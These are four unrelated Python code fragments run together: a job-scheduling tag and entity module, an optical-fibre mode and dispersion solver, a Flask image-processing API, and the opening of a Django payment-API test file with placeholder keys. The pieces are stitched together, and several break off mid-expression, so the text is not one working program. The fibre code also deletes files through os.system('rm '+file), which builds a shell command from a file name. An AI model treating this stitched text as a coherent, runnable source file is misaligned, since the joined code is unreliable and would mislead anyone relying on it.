return (all(other.contains_tag(required) for required in self.filter(TagType.REQUIRE)) and
all(self.contains_tag(required) for required in other.filter(TagType.REQUIRE)) and
not any(other.contains_tag(rejected) for rejected in self.filter(TagType.REJECT)) and
not any(self.contains_tag(rejected) for rejected in other.filter(TagType.REJECT)))
def contains_tag(self, tag) -> bool:
"""
Returns true if the name and value of the tag match. Ignores tag_type.
:param tag:
:return:
"""
return any(self.filter(tag_name=tag.name, tag_value=tag.value))
def score(self, other: TagSetManager) -> bool:
"""
Computes a compatibility score between tag sets.
:param other:
:return:
"""
return (sum(int(tag.tag_type) * int(o.tag_type) for tag in self.tags for o in other.tags
if tag.name == o.name and tag.value == o.value)
# penalize tags that don't exist in the other
- sum(int(tag.tag_type) for tag in self.tags if not other.contains_tag(tag)))
def __repr__(self):
return f"{self.__class__} tags={[tag for tag in self.tags]}"
@staticmethod
def from_dict(tags: list[dict]) -> TagSetManager:
tag_list = []
for tag_val in tags.get('require') or []:
tag_list.append(Tag(name="scheduling", value=tag_val, tag_type=TagType.REQUIRE))
for tag_val in tags.get('prefer') or []:
tag_list.append(Tag(name="scheduling", value=tag_val, tag_type=TagType.PREFER))
for tag_val in tags.get('accept') or []:
tag_list.append(Tag(name="scheduling", value=tag_val, tag_type=TagType.ACCEPT))
for tag_val in tags.get('reject') or []:
tag_list.append(Tag(name="scheduling", value=tag_val, tag_type=TagType.REJECT))
return TagSetManager(tags=tag_list)
class Entity(object):
def __init__(self, loader, id=None, cores=None, mem=None, gpus=None, env=None, params=None, tags=None, rank=None,
inherits=None):
self.loader = loader
self.id = id
self.cores = cores
self.mem = mem
self.gpus = gpus
self.env = env
self.params = params
self.tags = TagSetManager.from_dict(tags or {})
self.rank = rank
self.inherits = inherits
self.validate()
def validate(self):
"""
Validates each code block and makes sure the code can be compiled.
This process also results in the compiled code being cached by the loader,
so that future evaluations are faster.
"""
if self.cores:
self.loader.compile_code_block(self.cores)
if self.mem:
self.loader.compile_code_block(self.mem)
if self.gpus:
self.loader.compile_code_block(self.gpus)
if self.env:
for key, entry in self.env.items():
self.loader.compile_code_block(entry, as_f_string=True)
if self.params:
for key, param in self.params.items():
self.loader.compile_code_block(param, as_f_string=True)
if self.rank:
self.loader.compile_code_block(self.rank)
def __repr__(self):
return f"{self.__class__} id={self.id}, cores={self.cores}, mem={self.mem}, gpus={self.gpus}, " \
f"env={self.env}, params={self.params}, tags={self.tags}, rank={self.rank[:10] if self.rank else ''}, " \
f"inherits={self.inherits}"
def override(self, entity):
new_entity = copy.copy(entity)
new_entity.id = self.id or entity.id
new_entity.cores = self.cores or entity.cores
new_entity.mem = self.mem or entity.mem
new_entity.gpus = self.gpus or entity.gpus
new_entity.env = copy.copy(entity.env) or {}
new_entity.env.update(self.env or {})
new_entity.params = copy.copy(entity.params) or {}
new_entity.params.update(self.params or {})
new_entity.rank = self.rank if self.rank is not None else entity.rank
new_entity.inherits = self.inherits if self.inherits is not None else entity.inherits
return new_entity
def inherit(self, entity):
if entity:
new_entity = self.override(entity)
new_entity.tags = self.tags.inherit(entity.tags)
return new_entity
else:
return copy.deepcopy(self)
def combine(self, entity):
"""
The combine operation takes an entity and combines its requirements with a second entity.
For example, a User entity and a Tool entity can be combined to create a merged entity that contain
both their mutual requirements, as long as they do not define mutually incompatible requirements.
For example, if a User requires the "pulsar" tag, but the tool rejects the "pulsar" tag.
In this case, an IncompatibleTagsException will be thrown.
If both entities define cpu, memory and gpu requirements, the lower of those requirements are used.
This provides a mechanism for limiting the maximum memory used by a particular Group or User.
The general hierarchy of entities in vortex is User > Role > Tool and therefore, these entity
are usually merged as: tool.combine(role).combine(user), to produce a final set of tool requirements.
The combined requirements can then be matched against the destination, through the match operation.
:param entity:
:return:
"""
new_entity = entity.override(self)
if self.cores and entity.cores:
new_entity.cores = min(self.cores, entity.cores)
if self.mem and entity.mem:
new_entity.mem = min(self.mem, entity.mem)
if self.gpus and entity.gpus:
new_entity.gpus = min(self.gpus, entity.gpus)
new_entity.id = f"{type(self).__name__}: {self.id}, {type(entity).__name__}: {entity.id}"
new_entity.tags = self.tags.combine(entity.tags)
return new_entity
def matches(self, destination, context):
"""
The match operation checks whether all of the require tags in an entity are present
in the destination entity, and none of the reject tags in the first entity are
present in the second entity.
This is used to check compatibility of a final set of combined tool requirements with its destination.
:param destination:
:return:
"""
if destination.cores and self.cores and destination.cores < self.cores:
return False
if destination.mem and self.mem and destination.mem < self.mem:
return False
if destination.gpus and self.gpus and destination.gpus < self.gpus:
return False
return self.tags.match(destination.tags or {})
def evaluate_early(self, context):
"""
Evaluate expressions in entity properties that must be evaluated early, which
is to say, evaluated prior to combining entity requirements. These properties
are namely, cores, mem and gpus, since at the time of combining entity requirements,
the properties must be compared.
:param context:
:return:
"""
new_entity = copy.deepcopy(self)
if self.gpus:
new_entity.gpus = self.loader.eval_code_block(self.gpus, context)
context['gpus'] = new_entity.gpus
if self.cores:
new_entity.cores = self.loader.eval_code_block(self.cores, context)
context['cores'] = new_entity.cores
if self.mem:
new_entity.mem = self.loader.eval_code_block(self.mem, context)
return new_entity
def evaluate_late(self, context):
"""
Evaluate expressions in entity properties that must be evaluated as late as possible, which is
to say, after combining entity requirements. This includes env and params, that rely on
properties such as cores, mem and gpus after they are combined.
:param context:
:return:
"""
new_entity = copy.deepcopy(self)
context['gpus'] = new_entity.gpus
context['cores'] = new_entity.cores
context['mem'] = new_entity.mem
if self.env:
evaluated_env = {}
for key, entry in self.env.items():
evaluated_env[key] = self.loader.eval_code_block(entry, context, as_f_string=True)
new_entity.env = evaluated_env
context['env'] = new_entity.env
if self.params:
evaluated_params = {}
for key, param in self.params.items():
evaluated_params[key] = self.loader.eval_code_block(param, context, as_f_string=True)
new_entity.params = evaluated_params
context['params'] = new_entity.params
return new_entity
def rank_destinations(self, destinations, context):
if self.rank:
log.debug(f"Ranking destinations: {destinations} for entity: {self} using custom function")
context['candidate_destinations'] = destinations
return self.loader.eval_code_block(self.rank, context)
else:
# Sort destinations by priority
log.debug(f"Ranking destinations: {destinations} for | |
import numpy as np
import matplotlib.pyplot as plt
from scipy.optimize import brenth, root, brentq, bisect
from scipy.constants import c, pi
from scipy.special import jv, kv, jvp, kvp
from scipy.interpolate import interp1d
from scipy.integrate import simps
import sys
import warnings
from pprint import pprint
from math import factorial
from itertools import combinations_with_replacement, permutations
import h5py
import os
from scipy.interpolate import UnivariateSpline
from numba import jit, vectorize
import time
from six.moves import builtins
try:
builtins.profile
except AttributeError:
def profile(func):
return func
#@jit
def jv_(n, z):
return 0.5 * (jv(n-1, z) - jv(n+1, z))
#@jit
def kv_(n, z):
return -0.5 * (kv(n-1, z) + kv(n+1, z))
def save_variables_step(filename, filepath='', **variables):
file = os.path.join(filepath, filename+'.hdf5')
if os.path.isfile(file):
os.system('rm '+file)
with h5py.File(file, 'a') as f:
for i in (variables):
f.create_dataset(str(i), data=variables[i])
return None
class Fibre(object):
"""
Fibre class. Set to initiate the functions needed
for a fibre ( Seilmier equations etc).
"""
def __init__(self):
self._A_ = {'sio2': [0.6965325, 0.0660932**2],
'ge': [0.7083925, 0.0853842**2]}
self._B_ = {'sio2': [0.4083099, 0.1181101**2],
'ge': [0.4203993, 0.1024839**2]}
self._C_ = {'sio2': [0.8968766, 9.896160**2],
'ge': [0.8663412, 9.896175**2]}
return None
def indexes(self, l, r, per, err, plot=False):
per_core, per_clad = per
self.A = [self._A_[str(per_core)], self._A_[str(per_clad)]]
self.B = [self._B_[str(per_core)], self._B_[str(per_clad)]]
self.C = [self._C_[str(per_core)], self._C_[str(per_clad)]]
core, clad = self.sellmeier(l)
N_cores = len(r)
try:
self.clad = np.repeat(clad[np.newaxis, :], N_cores, axis=0)
np.random.seed(int(time.time()+10))
self.core = np.zeros([N_cores, len(l)])
for i in range(N_cores):
self.core[i, :] = \
err[i]*(core - clad) + core
except IndexError:
# print('index')
self.clad = clad
self.core = np.random.rand(N_cores)*err*(core - clad) + core
pass
if not(plot):
# print(self.core)
# print(self.clad)
try:
assert((self.core > self.clad).all())
except AssertionError:
print(self.core.shape)
plt.plot(self.core, label='core')
plt.plot(self.clad, label='clad')
plt.show()
assert((self.core > self.clad).all())
return self.core, self.clad
def sellmeier(self, l):
l = (l*1e6)**2
n = []
for a, b, c in zip(self.A, self.B, self.C):
n.append(
(1 + l*(a[0]/(l - a[1]) + b[0]/(l - b[1]) + c[0]/(l - c[1])))**0.5)
return n
def V_func(self, l_vec, a_vec):
V_vec = np.empty([len(a_vec), len(l_vec)])
temp = (2 * pi / l_vec)
for i, a in enumerate(a_vec):
V_vec[i, :] = temp * a * \
(self.core[i, :]**2 - self.clad[i, :]**2)**0.5
self.V = V_vec
return None
def plot_fibre_n(self, l, r, per, err):
n = {}
for per in (('ge', 'ge'), ('sio2', 'sio2')):
nn = self.indexes(l, r, per, err, plot=True)
n[str(per[0])] = nn[0]
perc = (20, 30, 40, 50, 60)
fig = plt.figure()
for p, nn in n.items():
# print(p,nn)
plt.plot(l*1e9, nn[-1, :], label=p)
plt.xlabel(r'$\lambda (nm)$')
plt.ylabel(r'$n$')
plt.legend()
# plt.show()
return None
def beta_dispersions(self, o_vec, i):
coefs = self.beta_extrapo(o_vec, i)
betas = np.empty_like(coefs)
for i, c in enumerate(coefs[::-1]):
betas[i] = c * factorial(i)
return betas
@vectorize('float64(float64,float64,float64,float64,float64,float64)')
def res_faster(a, b, r, u, w, n):
return (a + b) * (a + b*r**2) \
- n**2 * (1/u**2 + 1/w**2) * (1/u**2 + r**2 / w**2)
class Eigenvalues(Fibre):
"""
Sets up to solve and solves the eigenvalue equation
to find the eigenvalues of HE11. Only works on a single mode
fibre. Inherits V number function from Fibre class.
"""
def __init__(self, l, r, ncore, nclad):
self.core, self.clad = ncore, nclad
self.V_func(l, r)
self.a_vec = r
self.l_vec = l
self.k = 2 * pi * c / l
self.ratio = self.clad/self.core
return None
#@profile
def w_f(self, u, i, j):
"""
Equation to get w eigenvalue with respect to guess u, and V.
"""
return (self.V[i, j]**2 - u**2)**0.5
#@profile
def eq(self, u_vec, i, j, n=1):
"""
The eigenvalue equation of a single mdoe fibre,
set by default to find the HE11 mode.
"""
u = u_vec
#@vectorize('float64(float64,float64,float64)')
w = self.w_f(u, i, j)
a = jv_(n, u)/(u*jv(n, u))
b = kv_(n, w)/(w*kv(n, w))
res = res_faster(a, b, self.ratio[i, j], u, w, n)
return res
def neff(self, i, j, u, w):
"""
Calculates the neff of each mode for sorting so the fundemental mode can be found.
"""
return (((self.core[i, j]/u)**2 + (self.clad[i, j]/w)**2)
/ (1/u**2 + 1/w**2))**0.5
def eigen_solver(self, margin, i, j):
"""
Finds the eigenvalues of the fibre using breth.
Inputs:
margin: A safety margin to save from the Zero division errors
that arrise from the Eigenvalue equation if u,w = 0
Returns:
u, w: eigenvalues of the equation, system exists if non are
found and the equation is plotted.
"""
converged = False
m = margin
V_d = []
nm = -1
s = []
count = 8
N_points = 2**count
found_all = 0
while found_all < 2:
nm = len(s)
u_vec = np.linspace(margin, self.V[i, j] - margin, N_points)
eq = self.eq(u_vec, i, j, n=1)
s = np.where(np.sign(eq[:-1]) != np.sign(eq[1:]))[0] + 1
count += 1
N_points = 2**count
if nm == len(s):
found_all += 1
u_sol, w_sol = np.zeros(len(s)), np.zeros(len(s))
for iss, ss in enumerate(s):
Rr = brenth(self.eq, u_vec[ss-1], u_vec[ss],
args=(i, j), full_output=True)
u_sol[iss] = Rr[0]
w_sol[iss] = self.w_f(Rr[0], i, j)
if len(s) != 0:
neffs = self.neff(i, j, u_sol, w_sol)
neffs = np.nan_to_num(neffs)
indx_fun = np.argmax(neffs)
#print(len(s), self.V[i,j], neffs[indx_fun])
#print(u_sol[indx_fun],w_sol[indx_fun], self.V[i,j])
# if len(s) >1:
# #print(s)
# plt.plot(u_vec, eq)
# plt.axhline(0, color='black')
# plt.title(str(1e9*self.l_vec[j]).format('%3') + ', ' +str(self.a_vec[i]).format('%3'))
# plt.ylim(-1,1)
# plt.show()
return u_sol[indx_fun], w_sol[indx_fun]
else:
print(
'----------------------------No solutions found for some inputs--------------------')
print(' V = ', self.V[i, j])
print(' R = ', self.a_vec[i])
print(' l = ', self.l_vec[j])
print(
'----------------------------------------------------------------------------------')
u = np.linspace(1e-6, self.V[i, j] - 1e-6, 2048)
print(self.V)
e = self.eq(u, i, j)
plt.plot(np.abs(u), e)
plt.xlim(u.min(), u.max())
plt.ylim(-10, 10)
plt.show()
sys.exit(1)
class Betas(Fibre):
"""
Calculates the betas of the fibre mode.
"""
def __init__(self, u_vec, w_vec, l_vec, o_vec, o, ncore, nclad):
#self.k = 2*pi/(l_vec)
self.u = u_vec
self.w = w_vec
self.core, self.clad = ncore, nclad
self.o_vec = o_vec
self.o = o
self.o_norm = self.o_vec - self.o
return None
def beta_func(self, o_vec, i):
"""
Calculates and returns the betas of the fibre
"""
return ((o_vec*1e12/c)**2*((self.core[i, :]/self.u[i, :])**2 +
(self.clad[i, :]/self.w[i, :])**2)/(1/self.u[i, :]**2
+ 1/self.w[i, :]**2))**0.5
# return (((self.core[i, j]/u)**2 + (self.clad[i, j]/w)**2)
# / (1/u**2 + 1/w**2))**0.5
def beta_extrapo(self, o_vec, i):
"""
Gets the polyonomial coefficiencts of beta(omega) with the
highest order possible.
"""
betas = self.beta_func(o_vec, i)
deg = 30
fitted = False
# warnings.warn(Warning())
with warnings.catch_warnings():
while not(fitted):
warnings.filterwarnings('error')
try:
coef = np.polyfit(self.o_norm, betas, deg=deg)
fitted = True
except Warning:
deg -= 1
return coef
class Modes(Fibre):
"""docstring for Modes"""
def __init__(self, o_vec, o_c, beta_c, u_vec, w_vec, a_vec, N_points, per, err, nm=2):
super().__init__()
self.n = 1
self.N_points = N_points
o_vec *= 1e12
o_c *= 1e12
o_norm = o_vec - o_c
#self.coordinates(x, y)
self.beta_c = beta_c
# indexes(self, l, r, per, err)
self.core = self.indexes(2*pi*c/o_c, a_vec, per, err)[0]
self.neff = self.beta_c / (o_c / c)
self.u_vec, self.w_vec = np.zeros(u_vec.shape[0]),\
np.zeros(u_vec.shape[0])
for i in range(u_vec.shape[0]):
self.u_vec[i] = interp1d(o_norm, u_vec[i, :], kind='cubic')(0)
self.w_vec[i] = interp1d(o_norm, w_vec[i, :], kind='cubic')(0)
self.a_vec = a_vec
return None
def set_coordinates(self, a):
self.x, self.y = np.linspace(-2*a, 2*a, self.N_points),\
np.linspace(-2*a, 2*a, self.N_points)
self.X, self.Y = np.meshgrid(self.x, self.y)
self.R = ((self.X)**2 + (self.Y)**2)**0.5
self.T = np.arctan(self.Y/self.X)
return None
def pick_eigens(self, i):
self.u = self.u_vec[i]
self.w = self.w_vec[i]
self.beta = self.beta_c[i]
self.a = self.a_vec[i]
self.s = self.n * (1/self.u**2 + 1/self.w**2) /\
(jv_(self.n, self.u)/(self.u*jv(self.n, self.u))
+ kv_(self.n, self.w)/(self.w*kv(self.n, self.w)))
return None
def E_r(self, r, theta):
r0_ind = np.where(r <= self.a)
r1_ind = np.where(r > self.a)
temp = np.zeros(r.shape, dtype=np.complex128)
r0, r1 = r[r0_ind], r[r1_ind]
temp[r0_ind] = -1j * self.beta*self.a / \
self.u*(0.5*(1 - self.s) * jv(self.n - 1, self.u * r0 / self.a)
- 0.5*(1 + self.s)*jv(self.n + 1, self.u * r0 / self.a))
temp[r1_ind] = -1j * self.beta*self.a*jv(self.n, self.u)/(self.w*kv(self.n, self.w)) \
* (0.5*(1 - self.s) * kv(self.n - 1, self.w * r1 / self.a)
+ 0.5*(1 + self.s)*kv(self.n+1, self.w * r1 / self.a))
return temp*np.cos(self.n*theta), temp*np.cos(self.n*theta+pi/2)
def E_theta(self, r, theta):
r0_ind = np.where(r <= self.a)
r1_ind = np.where(r > self.a)
temp = np.zeros(r.shape, dtype=np.complex128)
r0, r1 = r[r0_ind], r[r1_ind]
temp[r0_ind] = 1j * self.beta*self.a / \
self.u*(0.5*(1 - self.s) * jv(self.n - 1, self.u * r0 / self.a)
+ 0.5*(1 + self.s)*jv(self.n+1, self.u * r0 / self.a))
temp[r1_ind] = 1j * self.beta*self.a * \
jv(self.n, self.u)/(self.w*kv(self.n, self.w)) \
* (0.5*(1 - self.s) * kv(self.n | |
db.update_user_current(
content["email"], content["image_id"])
image = db.find_image(
content["image_id"], content["email"])
if not image:
return error_handler(
400, "Image does not exist", "ValueError")
image = db.image_to_json(image)
return jsonify(image)
@app.route("/api/process/confirm", methods=["POST"])
def post_confirm_image():
"""
Confirms image change and adds the image to the user.
Returns:
dict: Image that as associated with user.
"""
content = request.get_json()
if not _verify_confirm_image(content):
return error_handler(400, "Insufficient Inputs", "AttributeError")
# must contain image_data, email
added_image = db.add_image(content["email"], content)
added_image = db.image_to_json(added_image)
return jsonify(added_image)
def _verify_confirm_image(image):
"""
Confirms that all necessary attributes are present at image add.
Args:
image (dict): Image object to be added.
Returns:
bool: Whether or not the image object is valid.
"""
req = ['child_ids', 'processing_history', 'parent_id',
'description', 'processing_time', 'format', 'process',
'email', 'width', 'image_id', 'height', 'image_data']
if set(req).issubset(set(image.keys())):
return True
return False
@app.route("/api/image/get_images", methods=["POST"])
def post_get_images():
"""
Obtains images from database based on ID.
POSTed request should contain:
image_ids: as a list of images to get.
email: user associated with this images.
Returns:
list: all images
"""
content = request.get_json()
email = content["email"]
ret_images = []
if type(content["image_ids"]) != list:
content["image_ids"] = [content["image_ids"]]
get_images = content["image_ids"]
for image_id in get_images:
image = db.find_image(image_id, email)
ret_images.append(db.image_to_json(image))
return jsonify(ret_images)
@app.route("/api/image/get_images_zipped", methods=["POST"])
def post_get_images_zipped():
"""
Obtains zipped folder of images from database based on IDs.
POSTed request should contain:
image_ids: as a list of images to get.
email: user associated with this images.
format: format for the images to be converted to.
Returns:
dict: base 64 encoded zip file of all images.
"""
content = request.get_json()
email = content["email"]
if type(content["image_ids"]) != list:
content["image_ids"] = [content["image_ids"]]
format = _determine_format(content["format"]).lower()
# resets images.zip and temp folder
_remove_zip_docs()
# create a temp folder
folder_name = "temp"
if not os.path.exists(folder_name):
os.makedirs(folder_name)
# writes to temp folder
get_images = content["image_ids"]
file_extless_file = []
for image_id in get_images:
image = db.find_image(image_id, email)
np_image = b64str_to_numpy(image.image_data)
# save image to a temp folder
extless_file = os.path.splitext(image.filename)[0]
if extless_file in file_extless_file:
file_extless_file.append(extless_file)
filename = "{}_{}.{}".format(
extless_file, image_id, format)
else:
filename = "{}.{}".format(extless_file, format)
filepath = "{}/{}".format(folder_name, filename)
imageio.imwrite(filepath, np_image)
file_extless_file.append(filename)
# zip the directory
zip_filename = 'images.zip'
zipf = zipfile.ZipFile(
zip_filename, 'w', zipfile.ZIP_DEFLATED)
zip_folder(folder_name, zipf)
zipf.close()
# return object
ret = {
"filename": zip_filename,
"zip_data": zip_to_b64(zip_filename)
}
return jsonify(ret)
def _remove_zip_docs():
"""
Removes all the files associated with
downloading and sending a zip.
"""
if os.path.isdir("temp"):
shutil.rmtree('temp')
if os.path.exists("images.zip"):
os.remove('images.zip')
def zip_folder(folder_name, ziph):
"""
Zips folder given a path
Args:
folder_name (str): folder to zip
ziph: some zip path indicator.
"""
for file in os.listdir(folder_name):
ziph.write(folder_name + "/" + file, arcname=file)
def zip_to_b64(filepath):
"""
Takes a zip file and turns it to base 64.
Args:
filepath: Filepath of the folder to zip
Returns:
str: base 64 representation of zip folder.
"""
# convert zip file to base64
with open(filepath, "rb") as f:
bytes = f.read()
base64_bytes = base64.b64encode(bytes)
base64_string = base64_bytes.decode('utf-8') # convert to string
return base64_string
def _link_new_image(current_image):
"""
Makes associated links.
Args:
current_image: current image of the user/post data.
Returns:
dict: Dict with linked ids.
"""
if not current_image:
raise ValueError("current_image is None.")
new_image = db.image_to_json(current_image)
new_image["email"] = current_image.email
new_image["parent_id"] = current_image.image_id
new_image["format"] = current_image.format
new_image["image_id"] = random_id()
return new_image
def _populate_image_meta(new_image, image_data):
"""
Populates an existing dict with image meta information.
Args:
new_image (dict):
image_data (np.ndarray): image data in RGB
Returns:
dict: dict with image meta information
"""
new_image["width"] = image_data.shape[0]
new_image["height"] = image_data.shape[1]
return new_image
def _determine_format(format_string: str):
"""
Determines file format from a string. Could be header/ext.
Args:
format_string: Header or file extension.
Returns:
str: Type of the image.
"""
formats = ["PNG",
"TIF", "TIFF",
"JPG", "JPEG"]
for format in formats:
if format in format_string.upper():
if "JPEG" in format_string.upper():
return "JPG"
if "TIF" in format_string.upper():
return "TIFF"
return format
return "JPG" # assume jpg
@app.route("/api/process/hist_eq", methods=["POST"])
def post_hist_eq():
"""
Takes CURRENT image and performs histogram eq on image.
POSTed request should contain:
email: ID of the current user.
Returns:
object: New hist eq'd image.
"""
# should take the current image with all info
content = request.get_json()
# grab the user's current image.
user_image_id = db.get_current_image_id(content["email"])
current_image = db.find_image(user_image_id, content["email"])
new_image = _link_new_image(current_image)
image_data, new_image["processing_time"] = \
Processing(b64str_to_numpy(current_image.image_data)).hist_eq()
new_image = _populate_image_meta(new_image, image_data)
new_image["image_data"] = numpy_to_b64str(image_data,
format=new_image["format"])
new_image["image_data"], _ = _get_b64_format(new_image["image_data"])
new_image["histogram"] = _get_b64_histogram(image_data)
new_image["process"] = "hist_eq"
db.update_user_process(content["email"], new_image["process"])
return jsonify(new_image)
@app.route("/api/process/contrast_stretch", methods=["POST"])
def post_image_contrast_stretch():
"""
Takes CURRENT image and performs contrast stretch on image.
POSTed request should contain:
email: ID of the current user.
Returns:
object: New contrast stretched image.
"""
content = request.get_json()
p_low = request.args.get("l", 10)
p_high = request.args.get("h", 90)
percentile = (p_low, p_high)
user_image_id = db.get_current_image_id(content["email"])
current_image = db.find_image(user_image_id, content["email"])
new_image = _link_new_image(current_image)
image_data, new_image["processing_time"] = \
Processing(b64str_to_numpy(current_image.image_data)
).contrast_stretch(percentile)
new_image = _populate_image_meta(new_image, image_data)
new_image["image_data"] = numpy_to_b64str(image_data,
format=new_image["format"])
new_image["image_data"], _ = _get_b64_format(new_image["image_data"])
new_image["histogram"] = _get_b64_histogram(image_data)
new_image["process"] = "contrast_stretch"
db.update_user_process(content["email"], new_image["process"])
return jsonify(new_image)
@app.route("/api/process/log_compression", methods=["POST"])
def post_image_log_compression():
"""
Takes CURRENT image and performs log compression on image.
POSTed request should contain:
email: ID of the current user.
Returns:
object: New log compressed image.
"""
content = request.get_json()
user_image_id = db.get_current_image_id(content["email"])
current_image = db.find_image(user_image_id, content["email"])
new_image = _link_new_image(current_image)
image_data, new_image["processing_time"] = \
Processing(b64str_to_numpy(current_image.image_data)).log_compression()
new_image = _populate_image_meta(new_image, image_data)
new_image["image_data"] = numpy_to_b64str(image_data,
format=new_image["format"])
new_image["image_data"], _ = _get_b64_format(new_image["image_data"])
new_image["histogram"] = _get_b64_histogram(image_data)
new_image["process"] = "log_compression"
db.update_user_process(content["email"], new_image["process"])
return jsonify(new_image)
@app.route("/api/process/reverse_video", methods=["POST"])
def post_image_rev_video():
"""
Inverse the intensities of a grayscale image.
Only works for grayscale images
POSTed request should contain:
email: ID of the current user.
Returns:
dict: image with inverted intensities.
"""
content = request.get_json()
user_image_id = db.get_current_image_id(content["email"])
current_image = db.find_image(user_image_id, content["email"])
new_image = _link_new_image(current_image)
try:
image_data, new_image["processing_time"] = \
Processing(b64str_to_numpy(
current_image.image_data)).reverse_video()
except ValueError:
return error_handler(400, "must be grayscale", "ValueError")
new_image = _populate_image_meta(new_image, image_data)
# maybe something else
new_image["image_data"] = numpy_to_b64str(image_data,
format=new_image["format"])
new_image["image_data"], _ = _get_b64_format(new_image["image_data"])
new_image["histogram"] = _get_b64_histogram(
image_data, is_gray=True)
new_image["process"] = "reverse_video"
db.update_user_process(content["email"], new_image["process"])
return jsonify(new_image)
@app.route("/api/process/sharpen", methods=["POST"])
def post_image_sharpen():
"""
Takes CURRENT image and performs image sharpen on whole image.
POSTed request should contain:
email: ID of the current user.
Returns:
object: sharpened image.
"""
content = request.get_json()
user_image_id = db.get_current_image_id(content["email"])
current_image = db.find_image(user_image_id, content["email"])
new_image = _link_new_image(current_image)
image_data, new_image["processing_time"] = \
Processing(b64str_to_numpy(current_image.image_data)).sharpen()
new_image = _populate_image_meta(new_image, image_data)
new_image["image_data"] = numpy_to_b64str(image_data,
format=new_image["format"])
new_image["image_data"], _ = _get_b64_format(new_image["image_data"])
new_image["histogram"] = _get_b64_histogram(image_data)
new_image["process"] = "sharpen"
db.update_user_process(content["email"], new_image["process"])
return jsonify(new_image)
@app.route("/api/process/blur", methods=["POST"])
def post_image_blur():
"""
Takes CURRENT image and performs image blur on whole image.
POSTed request should contain:
email: ID of the current user.
Returns:
object: blurred image.
"""
content = request.get_json()
user_image_id = db.get_current_image_id(content["email"])
current_image = db.find_image(user_image_id, content["email"])
new_image = _link_new_image(current_image)
image_data, new_image["processing_time"] = \
Processing(b64str_to_numpy(current_image.image_data)).blur()
new_image = _populate_image_meta(new_image, image_data)
new_image["image_data"] = numpy_to_b64str(image_data,
format=new_image["format"])
new_image["image_data"], _ = _get_b64_format(new_image["image_data"])
new_image["histogram"] = _get_b64_histogram(image_data)
new_image["process"] = "blur"
db.update_user_process(content["email"], new_image["process"])
return jsonify(new_image)
def _get_b64_histogram(image_data, is_gray=False):
"""
Gets a base 64 representation of a histogram for an image
Args:
image_data (np.ndarray): Image.
Returns:
str: Base 64 representation of the histogram for image.
"""
histogram = Processing(
image_data, is_color=False).histogram(
image_data, is_gray=is_gray)
histogram = histogram[:, :, :3]
return numpy_to_b64str(histogram)
@app.route("/api/process/email_image", methods=["POST"])
def post_email_image():
"""
Returns the information about if the image was emailed.
POSTed request should contain:
email: email of the current user.
image_id: id of the image to email
Returns:
object: response from Sendgrid.
"""
content = request.get_json()
if "email" not in content.keys():
return error_handler(400,
"must contain email", "AttributeError")
if "image_id" not in content.keys():
return error_handler(400,
"must contain image_id", "AttributeError")
email = content["email"]
image_id = content["image_id"]
image = db.find_image(image_id, email)
if image is not None:
return email_image(image)
return None
def b64str_to_numpy(b64_img):
"""
Converts a b64str to numpy. Strips headers.
Args:
b64_img (str): base 64 representation of an image.
Returns:
np.ndarray: numpy array of image.
"""
b64_img, _ = _get_b64_format(b64_img)
byte_image = base64.b64decode(b64_img)
image_buf = io.BytesIO(byte_image)
np_img = imageio.imread(image_buf)
return np_img
def _get_b64_format(b64_img):
"""
Determines the format of the b64 string
Args:
b64_img (str): base 64 representation of an image.
Returns:
b64_image: Array data of the image only
image_format: The format of the image
"""
split = b64_img.split("base64,") # get rid of header
if len(split) == 2:
b64_img = split[1]
image_format = _determine_format(split[0])
else:
b64_img = split[0]
image_format = "JPG" # assume | |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys, io, traceback, time, json, copy, math
import logging
from calendar import timegm
import datetime as dt
from datetime import timedelta
sys.path.append('../stakingsvc/')
from django.contrib.auth.models import User
from django.test import TestCase, TransactionTestCase
from django.test import Client
from unittest.mock import Mock, MagicMock, patch
from tradeex.data.tradeapirequest import TradeAPIRequest
from tradeex.data.api_const import *
from tradeex.controllers.apiusertransmanager import APIUserTransactionManager
from tradeex.apitests.tradingutils import *
from tradeex.apitests.util_tests import *
from tradeex.responses.heepaynotify import HeepayNotification
from tradeex.controllers.crypto_utils import *
from tradeex.models import *
from trading.models import *
from trading.controller import useraccountinfomanager, ordermanager
import json
# match the hy_bill_no in test data test_heepay_confirm.json
TEST_HY_BILL_NO='180102122300364021000081666'
TEST_HY_APPID = 'hyq17121610000800000911220E16AB0'
TEST_HY_KEY='4AE4583FD4D240559F80ED39'
TEST_BUYER_ACCOUNT='13910978598'
TEST_SELLER_ACCOUNT='api_user2_12345'
TEST_API_USER1_APPKEY = 'TRADEEX_USER1_APP_KEY_1234567890ABCDE'
TEST_API_USER2_APPKEY = 'TRADEEX_USER2_APP_KEY_SELLER'
TEST_API_USER1_SECRET='TRADEEX_USER1_APP_SECRET'
TEST_API_USER2_SECRET='TRADEEX_USER2_API_SECRET'
TEST_OUT_TRADE_NO_REDEEM = 'order_to_redeem'
TEST_PURCHASE_AMOUNT = 6200
TEST_REDEEM_AMOUNT = 5000
TEST_CNY_ADDR="TRADDEX_USER1_EXTERNAL_TEST_ADDR"
TEST_CRYPTO_SEND_COMMENT = ""
TEST_NOTIFY_URL = "http://testurl/"
heepay_reponse_template = json.load(io.open('trading/tests/data/heepay_return_success.json', 'r', encoding='utf-8'))
logger = logging.getLogger('tradeex.apitests.test_trading')
#mock function
def send_buy_apply_request_side_effect(payload):
json_payload = json.loads(payload)
biz_content = json.loads(json_payload['biz_content'])
key_values = {}
key_values['app_id'] = json_payload['app_id']
key_values['out_trade_no'] = biz_content['out_trade_no']
key_values['subject'] = biz_content['subject']
key_values['total_fee'] = biz_content['total_fee']
key_values['hy_bill_no'] = TEST_HY_BILL_NO
buy_order = Order.objects.get(pk=biz_content['out_trade_no'])
buyer_account = TEST_BUYER_ACCOUNT
#TODO: ??? Does Heepay purchase request need from account?
"""
try:
buyer_account = UserPaymentMethod.objects.get(
user__id=buy_order.user.id,
provider__code = 'heepay').account_at_provider
except UserPaymentMethod.DoesNotExist:
logger.error('send_buy_apply_request_side_effec(): cannot find the payment account of the buyer that test trans {0} try to sell'.format(biz_content['out_trade_no']))
return 500, 'error', '{}'
except UserPaymentMethod.MultipleObjectsReturned:
logger.error('System find more than one payment account of the buyer that test trans {0} try to sell'.format(biz_content['out_trade_no']))
return 500, 'error', '{}'
"""
#TODO: if trans state the buyer account
try:
seller_account = UserPaymentMethod.objects.get(
user__id=buy_order.reference_order.user.id,
provider__code = 'heepay').account_at_provider
except UserPaymentMethod.DoesNotExist:
